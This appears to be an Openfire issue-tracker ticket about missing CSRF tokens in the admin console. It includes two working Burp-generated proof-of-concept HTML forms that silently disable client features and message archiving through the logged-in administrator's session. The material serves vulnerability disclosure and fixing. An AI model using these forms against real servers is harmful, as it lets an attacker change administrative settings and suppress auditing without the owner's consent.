Originally, this ticket related to a CSRF vulnerability in the admin console reported by Sven Tantau (see Ignite Forum URL) which referenced the now defunct site [httx://1337day.com/exploits/21338]. This ticket has been updated with more recent info from hyp3rlinx.
Vulnerability Details:
No CSRF token exists within the Openfire Admin Console, which allows an attacker to perform state-changing actions against the application from a form hosted on another site, using the logged-in administrator's browser session. Examples include:
Changing the admin password
Adding arbitrary users to the system
Editing server settings e.g. turning SSL off
Adding rogue malicious clients with permit access (e.g. allow all XMPP clients to connect)
and more...
Exploit Code(s) / Full Details:
https://packetstormsecurity.com/files/133554/Openfire-3.10.2-Cross-Site-Request-Forgery.html
Audit policy ignores the CSRF token, and works without it.
Thus you can disable auditing by making the admin visit a URL like this.
Ah, Dave clarified: for audit-policy the update fails, but the values shown are in the request.
Client Control also has CSRF on features.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/clientcontrol/client-features.jsp" method="POST">
<input type="hidden" name="accountsEnabled" value="false" />
<input type="hidden" name="addcontactsEnabled" value="false" />
<input type="hidden" name="addgroupsEnabled" value="false" />
<input type="hidden" name="advancedEnabled" value="false" />
<input type="hidden" name="avatarsEnabled" value="false" />
<input type="hidden" name="broadcastEnabled" value="false" />
<input type="hidden" name="removalsEnabled" value="false" />
<input type="hidden" name="renamesEnabled" value="false" />
<input type="hidden" name="transferEnabled" value="false" />
<input type="hidden" name="helpforumsEnabled" value="false" />
<input type="hidden" name="helpuserguideEnabled" value="false" />
<input type="hidden" name="historyEnabled" value="false" />
<input type="hidden" name="hostnameEnabled" value="false" />
<input type="hidden" name="invisibleloginEnabled" value="false" />
<input type="hidden" name="logoutexitEnabled" value="false" />
<input type="hidden" name="movecopyEnabled" value="false" />
<input type="hidden" name="passwordchangeEnabled" value="false" />
<input type="hidden" name="personsearchEnabled" value="false" />
<input type="hidden" name="pluginsEnabled" value="false" />
<input type="hidden" name="preferencesEnabled" value="false" />
<input type="hidden" name="presenceEnabled" value="false" />
<input type="hidden" name="vcardEnabled" value="false" />
<input type="hidden" name="savepassandautologinEnabled" value="false" />
<input type="hidden" name="updatesEnabled" value="false" />
<input type="hidden" name="viewnotesEnabled" value="false" />
<input type="hidden" name="viewtasklistEnabled" value="false" />
<input type="hidden" name="submit" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
/plugins/monitoring/archiving-settings.jsp has no CSRF
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/monitoring/archiving-settings.jsp" method="POST">
<input type="hidden" name="roomArchiving" value="off" />
<input type="hidden" name="maxTime" value="0" />
<input type="hidden" name="messageArchiving" value="off" />
<input type="hidden" name="maxAge" value="1" />
<input type="hidden" name="cancel" value="Cancel" />
<input type="hidden" name="idleTime" value="0" />
<input type="hidden" name="metadataArchiving" value="off" />
<input type="hidden" name="maxRetrievable" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
/server-db-stats.jsp can be disabled by URL, this would be rather a lame hack. Or the collected stats cleared, also lame.